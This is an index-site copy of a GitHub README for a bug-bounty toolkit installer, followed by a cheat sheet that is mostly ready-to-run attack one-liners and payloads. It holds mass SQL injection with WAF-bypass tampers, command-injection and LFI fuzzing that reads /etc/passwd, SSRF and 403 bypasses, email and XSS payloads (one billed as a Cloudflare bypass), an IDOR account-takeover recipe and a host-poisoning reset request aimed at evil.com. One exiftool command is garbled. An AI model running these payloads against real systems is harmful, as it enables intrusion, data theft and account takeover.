Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/0xJin/awesome-bugbounty-builder
Awesome Bug bounty builder Project
https://github.com/0xJin/awesome-bugbounty-builder
List: awesome-bugbounty-builder
Last synced: 3 months ago
JSON representation
Awesome Bug bounty builder Project
- Host: GitHub
- URL: https://github.com/0xJin/awesome-bugbounty-builder
- Owner: 0xJin
- License: gpl-3.0
- Created: 2021-12-27T09:24:14.000Z (almost 3 years ago)
- Default Branch: main
- Last Pushed: 2023-02-15T15:51:41.000Z (over 1 year ago)
- Last Synced: 2024-05-22T15:13:30.668Z (6 months ago)
- Language: Shell
- Size: 184 KB
- Stars: 623
- Watchers: 17
- Forks: 134
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-hacking-lists - 0xJin/awesome-bugbounty-builder - Awesome Bug bounty builder Project (Shell)
- StarryDivineSky - 0xJin/awesome-bugbounty-builder
README
# Awesome Bug Bounty Builder ¯\\_(ツ)_/¯
**Tested on Debian.**
![bb](https://user-images.githubusercontent.com/81621963/147457586-79ac41eb-f995-455b-a144-f80a5783047a.PNG)
---
## Installation:
```sh
$ git clone https://github.com/0xJin/awesome-bugbounty-builder.git
$ cd awesome-bugbounty-builder/
$ chmod +x awesome-bugbounty-build.sh
$ ./awesome-bugbounty-builder.sh
```## Tools You will find here
- Amass
- Sublister
- Gauplus
- HTTPX
- Gf + patterns
- Kxss
- Sqlmap
- Commix
- Tplmap
- HYDRA
- John the ripper
- Evilwinrm
- Arjun
- Paramspider
- NoSQLmap
- NMAP
- Nikto
- FFUF
- 403-Bypass
- Gobuster
- Seclists
- Hash-identifier
- XSSMAP
- Smuggler
- SSRFmap
- Gmapsapiscanner
- Qsreplace
- exiftool
- XSRFProbe
- XXE Exploiter
- Rustscan
- LFISuite
- Wapiti
- Nuclei + template
- URO
- Freq
- Subzy
- OpenRedireX
- GooFuzz
- Fuxploider
- CRLFUZZ
- CENT
- Liffy
- SSRF-tool
- Infoooze
- Ghauri---
## Bug Bounty TIPS and Usage of tools + One Liner TIPS :
### ONE-LINER *RECON* for FUZZ XSS :
```sh
$ amass enum -brute -passive -d example.com | httpx -silent -status-code | tee domain.txt
$ cat domain.txt | gauplus -random-agent -t 200 | gf xss | kxss | tee domain2.txt
$ cat domain.txt | gauplus -random-agent -t 200 | gf xss | uro | qsreplace '">' | freq
```---
### FUZZ all SUBDOMAINS with *FUFF* ONE-LINER :
```sh
$ amass enum -brute -passive -d http://example.com | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w wordlist.txt -u @/FUZZ -mc 200'
```---
### COMMAND Injection with *FUFF* ONE-LINER :
```sh
$ cat subdomains.txt | httpx -silent -status-code | gauplus -random-agent -t 200 | qsreplace “aaa%20%7C%7C%20id%3B%20x” > fuzzing.txt
$ ffuf -ac -u FUZZ -w fuzzing.txt -replay-proxy 127.0.0.1:8080
// search for ”uid” in burp proxy intercept
// You can use the same query for search SSTI in qsreplase add "{{7*7}}" and search on burp for '49'
```---
### SQL Injection Tips :
```sh
// **MASS SQL injection**
$ amass enum -brute -passive -d example.com | httpx -silent -status-code | tee domain.txt
$ cat domain.txt | gauplus -random-agent -t 200 | gf sqli | tee domain2.txt
$ sqlmap -m domain2.txt -dbs --batch --random-agent
$ subfinder -dL domains.txt | dnsx | waybackurl | uro | grep "\?" | head -20 | httpx -silent > urls;sqlmap -m urls --batch --random-agent --level 1 | tee sqlmap.txt
// **SQL Injection headers**
$ sqlmap -u "http://redacted.com" --header="X-Forwarded-For: 1*" --dbs --batch --random-agent --threads=10
// **SQL Injection bypass 401**
$ sqlmap -u "http://redacted.com" --dbs --batch --random-agent --forms --ignore-code=401// PRO TIPS FOR BYPASSING WAF, add to SQLmap this tamper
--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,ifnull2ifisnull,modsecurityversioned,space2comment,randomcase
```---
### XSS + SQLi + CSTI/SSTI
```sh
Payload: '">{{7*7}}
```---
### EXIFTOOL + file UPLOAD Tips :
```sh
$ exiftool -Comment="&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
```---
### LFI ONE-LINER :
```sh
$ gauplus -random-agent -t 200 http://redacted.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
$ assetfinder -subs-only target.com | httpx -silent -nc -p 80,443,8080,8443,9000,9001,9002,9003,8888,8088,8808 -path "/logs/downloadMainLog?fname=../../../../../../..//etc/passwd" -mr "root:x:" -t 60
$ cat domains.txt | gauplus -random-agent -t 10 | gf lfi | qsreplace ".%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd" | httpx -silent -nc -mr "root:x:" -t 250
```---
### Best SSRF Bypass :
```sh
http://127.1/
http://0000::1:80/
http://[::]:80/
http://2130706433/
http://[email protected]
http://0x7f000001/
http://017700000001
http://0177.00.00.01
```### Best SSRF Tips using this tool :
```sh
$ amass enum -passive -brute -d yahoo.com -silent | httpx -silent | tee domains.txt | ssrf-tool -domains domains.txt -payloads payloads.txt -silent=false -paths=true -patterns patterns.txt
$ echo "twitter.com" | gauplus -random-agent -t 100 | tee domains.txt; ssrftool -domains domains.txt -silent=false -paths=false -payloads payloads.txt
```---
### Email Attacks :
```sh
// **Header Injection**
"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
"[email protected]>\r\nRCPT TO:alert(0))@example.com
test@example(alert(0)).com
"alert(0)"@example.com
// **SST Injection**
"<%= 7 * 7 %>"@example.com
test+(${{7*7}})@example.com
// **SQL Injection**
"' OR 1=1 -- '"@example.com
"mail'); SLEEP(5);--"@example.com
// **SSRF Attack**
[email protected]
john.doe@[127.0.0.1]
```---
### XSS Payload for Image
```sh
.png
">.png
">.svg
<alert('xss')<!--a-->a.png
```---
### My XSS for bypass CLOUDFLARE with default rules
```sh
"/><svg+svg+svg\/\/On+OnLoAd=confirm(1)>
```---
### Find hidden params in javascript files:
```sh
$ amass enum -passive -brute -d redacted.com | gau | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"; done
```---
### IDOR to Account TakeOver quickly :
```sh
~Create an account
~In the reset field set a password and intercept with burp
~GET /user/2099/reset (change to 2098) send the request
~Take the token
~Cookie editor and use this token
~Reload page
```---
### For API-KEYS :
```sh
$ use gauplus and paramspider , after you can grep words like "api" or "key" and use gmapsapiscanner for see if is vulnerable.
```### Find sensitive information with GF tool :
```sh
$ gauplus redacted.com -subs | cut -d"?" -f1 | grep -E "\.js+(?:on|)$" | tee domains.txt
sort -u domains.txt | fff -s 200 -o out/
$ for i in `gf -list`; do [[ ${i} =~ "_secrets"* ]] && gf ${i}; done
```---
### Bypass RATE-LIMIT by adding :
```sh
X-Originating-IP: IP
X-Forwarded-For: IP
X-Remote-IP: IP
X-Remote-Addr: IP
X-Client-IP: IP
X-Host: IP
X-Forwared-Host: IP
```---
### Find Access Token with FFUF and GAUPLUS :
```sh
$ cat domains.txt | sed 's/https\?:\/\///' | gau > domains2.txt
$ cat domains2.txt | grep -P "\w+\.js(\?|$)" | sort -u > jsurls.txt
$ ffuf -mc 200 w jsurls.txt:HFUZZ -u HFUZZ -replay-proxy http://127.0.0.1:8080
// Use Scan Check Builder Burp extension, add passive profile to extract “accessToken” or “access_token”
// Extract found tokens and validate with https://github.com/streaak/keyhacks
```---
### Find CORS vulnerabilities :
```sh
$ amass enum -d redacted.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin: evil.com" {} | [[ $(grep -c "evil.com") -gt 0 ]] && printf "\n3[0;32m[VUL TO CORS] 3[0m{}"' 2>/dev/null
```---
### Bypass 403 and 401 :
```
X-Original-URL: /admin
X-Override-URL: /admin
X-Rewrite-URL: /admin
```---
### Web Cache Deception :
https://hackerone.com/reports/397508
---
### Web Cache Poisoning :
https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9
---
### Password poisoning bypass to account takeover :
```
// Request
POST https://target.com/password-reset?user=123 HTTP/1.1
Host: evil.com// If you receive a link this works!
```---
### Best Wordlists :
```
https://github.com/six2dez/OneListForAll/releases
https://github.com/Karanxa/Bug-Bounty-Wordlists
```---
## Thanks
<a href="https://www.buymeacoffee.com/0xJin" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/v2/default-red.png" alt="Buy Me A Coffee" style="height: 60px !important;width: 217px !important;" ></a>
Don't forget to follow me on Twitter.
[@0xJin](https://twitter.com/0xJin) - This tool is made with ❤️ by 0xJin ¯\\_(ツ)_/¯.